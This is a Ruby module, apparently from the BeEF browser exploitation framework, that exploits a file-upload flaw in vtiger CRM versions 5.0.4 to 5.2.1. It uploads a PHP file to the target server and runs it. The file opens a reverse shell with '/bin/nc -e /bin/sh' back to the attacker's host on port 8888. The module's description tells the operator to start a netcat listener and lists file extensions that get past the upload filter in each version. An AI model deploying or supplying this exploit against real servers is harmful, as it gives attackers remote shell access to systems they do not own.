/modules/network/vtiger_crm_upload_exploit/module.rb

https://github.com/asaafan/BeEF · Ruby · 64 lines · 40 code · 9 blank · 15 comment · 3 complexity · a36e3c919dc10cbed150c3a2e12e1b0d MD5 · raw file 

    

  1. #
    2. 

  2. #   Copyright 2011 Wade Alcorn wade@bindshell.net
    3. 

  3. #
    4. 

  4. #   Licensed under the Apache License, Version 2.0 (the "License");
    5. 

  5. #   you may not use this file except in compliance with the License.
    6. 

  6. #   You may obtain a copy of the License at
    7. 

  7. #
    8. 

  8. #       http://www.apache.org/licenses/LICENSE-2.0
    9. 

  9. #
    10. 

  10. #   Unless required by applicable law or agreed to in writing, software
    11. 

  11. #   distributed under the License is distributed on an "AS IS" BASIS,
    12. 

  12. #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    13. 

  13. #   See the License for the specific language governing permissions and
    14. 

  14. #   limitations under the License.
    15. 

  15. #
    16. 

  16. class Vtiger_crm_upload_exploit < BeEF::Core::Command
    17. 

  17.   
    18. 

  18.   def initialize
    19. 

  19.     time = Time.new
    20. 

  20.     weekno = case time.day
    21. 

  21.         when 1..7 then 1
    22. 

  22.         when 8..14 then 2
    23. 

  23.         when 15..21 then 3
    24. 

  24.         when 22..28 then 4
    25. 

  25.         else 5
    26. 

  26.     end
    27. 

  27. 

  28.     @configuration = BeEF::Core::Configuration.instance
    29. 

  29.     beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
    30. 

  30. 

  31.     super({
    32. 

  32.       'Name' => 'VTiger CRM Upload Exploit',
    33. 

  33.       'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888. <br><br>vTigerCRM 5.0.4: Use extension "PHP" and php code.<br>vTigerCRM 5.2.0: Use extension "phtml" and php code.<br>vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
    34. 

  34.       'Category' => 'Network',
    35. 

  35.       'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
    36. 

  36.       'Data' =>
    37. 

  37.           [
    38. 

  38.               {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
    39. 

  39.               {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
    40. 

  40.               {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
    41. 

  41.               {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
    42. 

  42.               {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
    43. 

  43.               {'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
    44. 

  44.           ],
    45. 

  45.       'File' => __FILE__
    46. 

  46.     })
    47. 

  47. 

  48.     set_target({
    49. 

  49.       'verified_status' =>  VERIFIED_WORKING, 
    50. 

  50.       'browser_name' =>     ALL
    51. 

  51.     })
    52. 

  52.     
    53. 

  53.     use 'beef.net.local'
    54. 

  54.     
    55. 

  55.     use_template!
    56. 

  56.   end
    57. 

  57.   
    58. 

  58.   def callback
    59. 

  59.     return if @datastore['result'].nil?
    60. 

  60.     
    61. 

  61.     save({'result' => @datastore['result']})
    62. 

  62.   end
    63. 

  63.   
    64. 

  64. end
    65.